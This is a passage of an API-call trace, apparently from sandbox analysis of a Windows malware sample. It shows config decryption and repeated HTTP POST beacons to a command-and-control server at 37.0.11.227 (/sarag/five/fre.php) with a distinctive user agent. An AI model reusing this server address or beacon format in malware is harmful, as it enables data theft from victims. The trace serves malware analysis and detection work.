0x690000 [0269.191] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0269.191] send (s=0x804, buf=0x6ad508*, len=242, flags=0) returned 242 [0269.192] send (s=0x804, buf=0x6aba40*, len=159, flags=0) returned 159 [0269.192] GetProcessHeap () returned 0x690000 [0269.192] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0269.192] recv (in: s=0x804, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0269.266] GetProcessHeap () returned 0x690000 [0269.266] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0269.267] GetProcessHeap () returned 0x690000 [0269.267] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0269.267] GetProcessHeap () returned 0x690000 [0269.267] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afe00 | out: hHeap=0x690000) returned 1 [0269.268] GetProcessHeap () returned 0x690000 [0269.268] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0269.268] closesocket (s=0x804) returned 0 [0269.268] GetProcessHeap () returned 0x690000 [0269.268] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab410 | out: hHeap=0x690000) returned 1 [0269.268] GetProcessHeap () returned 0x690000 [0269.269] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0269.269] GetProcessHeap () returned 0x690000 [0269.269] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0269.269] GetProcessHeap () returned 0x690000 [0269.270] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0269.270] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15b8) returned 0x804 [0269.271] Sleep (dwMilliseconds=0xea60) [0269.273] GetProcessHeap () returned 0x690000 [0269.273] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0269.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.274] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0269.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.281] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0269.288] GetProcessHeap () returned 0x690000 [0269.288] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0269.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.289] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0269.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.290] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0269.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.291] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0269.291] GetProcessHeap () returned 0x690000 [0269.292] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0269.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.313] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0269.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.314] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0269.314] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.315] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0269.315] GetProcessHeap () returned 0x690000 [0269.315] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0269.315] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.316] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0269.316] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.317] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0269.317] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.317] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0269.318] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.318] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0269.318] GetProcessHeap () returned 0x690000 [0269.318] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0269.318] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0269.321] GetProcessHeap () returned 0x690000 [0269.321] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0269.321] GetProcessHeap () returned 0x690000 [0269.321] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0269.321] GetProcessHeap () returned 0x690000 [0269.322] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0269.322] GetProcessHeap () returned 0x690000 [0269.322] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0269.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.323] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0269.329] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.329] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0269.340] GetProcessHeap () returned 0x690000 [0269.340] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0269.341] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.344] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0269.348] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.348] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0269.349] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.349] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0269.349] GetProcessHeap () returned 0x690000 [0269.350] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0269.351] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.351] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0269.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.352] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0269.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.354] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0269.354] GetProcessHeap () returned 0x690000 [0269.354] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0269.355] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.355] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0269.357] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.357] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0269.358] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.358] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0269.359] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.359] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0269.359] GetProcessHeap () returned 0x690000 [0269.359] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0269.359] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0269.359] GetProcessHeap () returned 0x690000 [0269.359] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab420 [0269.360] socket (af=2, type=1, protocol=6) returned 0x808 [0269.360] connect (s=0x808, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0269.387] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0269.387] GetProcessHeap () returned 0x690000 [0269.387] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0269.387] GetProcessHeap () returned 0x690000 [0269.387] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0269.388] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0269.389] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0269.389] GetProcessHeap () returned 0x690000 [0269.389] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af680 [0269.389] GetProcessHeap () returned 0x690000 [0269.389] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0269.389] GetProcessHeap () returned 0x690000 [0269.389] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0269.389] GetProcessHeap () returned 0x690000 [0269.390] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0269.390] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0269.391] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0269.391] GetProcessHeap () returned 0x690000 [0269.391] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0269.391] GetProcessHeap () returned 0x690000 [0269.391] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0269.392] send (s=0x808, buf=0x6ad508*, len=242, flags=0) returned 242 [0269.392] send (s=0x808, buf=0x6aba40*, len=159, flags=0) returned 159 [0269.392] GetProcessHeap () returned 0x690000 [0269.392] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0269.392] recv (in: s=0x808, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0269.468] GetProcessHeap () returned 0x690000 [0269.468] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0269.469] GetProcessHeap () returned 0x690000 [0269.469] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0269.469] GetProcessHeap () returned 0x690000 [0269.469] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af680 | out: hHeap=0x690000) returned 1 [0269.469] GetProcessHeap () returned 0x690000 [0269.470] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0269.470] closesocket (s=0x808) returned 0 [0269.471] GetProcessHeap () returned 0x690000 [0269.471] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab420 | out: hHeap=0x690000) returned 1 [0269.471] GetProcessHeap () returned 0x690000 [0269.471] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0269.471] GetProcessHeap () returned 0x690000 [0269.471] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0269.471] GetProcessHeap () returned 0x690000 [0269.472] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0269.472] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15bc) returned 0x808 [0269.475] Sleep (dwMilliseconds=0xea60) [0269.476] GetProcessHeap () returned 0x690000 [0269.476] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0269.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.478] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0269.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.490] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0269.501] GetProcessHeap () returned 0x690000 [0269.501] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0269.502] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.519] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0269.520] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.521] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0269.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.531] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0269.531] GetProcessHeap () returned 0x690000 [0269.532] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0269.533] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.533] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0269.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.535] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0269.536] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.536] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0269.536] GetProcessHeap () returned 0x690000 [0269.536] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0269.537] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.540] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0269.541] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.541] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0269.543] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.543] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0269.544] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.544] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0269.544] GetProcessHeap () returned 0x690000 [0269.544] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0269.544] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0269.545] GetProcessHeap () returned 0x690000 [0269.545] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0269.546] GetProcessHeap () returned 0x690000 [0269.546] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0269.546] GetProcessHeap () returned 0x690000 [0269.546] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0269.546] GetProcessHeap () returned 0x690000 [0269.546] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0269.547] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.549] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0269.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.555] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0269.565] GetProcessHeap () returned 0x690000 [0269.565] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0269.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.566] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0269.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.568] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0269.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.569] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0269.569] GetProcessHeap () returned 0x690000 [0269.570] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0269.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.574] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0269.576] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.576] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0269.577] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.578] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0269.578] GetProcessHeap () returned 0x690000 [0269.578] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0269.579] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.580] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0269.581] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.582] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0269.586] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.587] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0269.588] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.588] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0269.588] GetProcessHeap () returned 0x690000 [0269.588] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0269.589] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0269.589] GetProcessHeap () returned 0x690000 [0269.589] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4a0 [0269.589] socket (af=2, type=1, protocol=6) returned 0x80c [0269.589] connect (s=0x80c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0269.620] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0269.621] GetProcessHeap () returned 0x690000 [0269.621] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0269.621] GetProcessHeap () returned 0x690000 [0269.621] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0269.622] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0269.623] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0269.623] GetProcessHeap () returned 0x690000 [0269.623] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0269.623] GetProcessHeap () returned 0x690000 [0269.624] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0269.624] GetProcessHeap () returned 0x690000 [0269.624] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0269.624] GetProcessHeap () returned 0x690000 [0269.624] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0269.625] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0269.626] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0269.626] GetProcessHeap () returned 0x690000 [0269.626] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0269.626] GetProcessHeap () returned 0x690000 [0269.626] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0269.626] send (s=0x80c, buf=0x6ad508*, len=242, flags=0) returned 242 [0269.629] send (s=0x80c, buf=0x6aba40*, len=159, flags=0) returned 159 [0269.629] GetProcessHeap () returned 0x690000 [0269.629] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0269.629] recv (in: s=0x80c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0269.709] GetProcessHeap () returned 0x690000 [0269.710] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0269.710] GetProcessHeap () returned 0x690000 [0269.710] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0269.710] GetProcessHeap () returned 0x690000 [0269.711] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0269.711] GetProcessHeap () returned 0x690000 [0269.711] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0269.711] closesocket (s=0x80c) returned 0 [0269.712] GetProcessHeap () returned 0x690000 [0269.712] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4a0 | out: hHeap=0x690000) returned 1 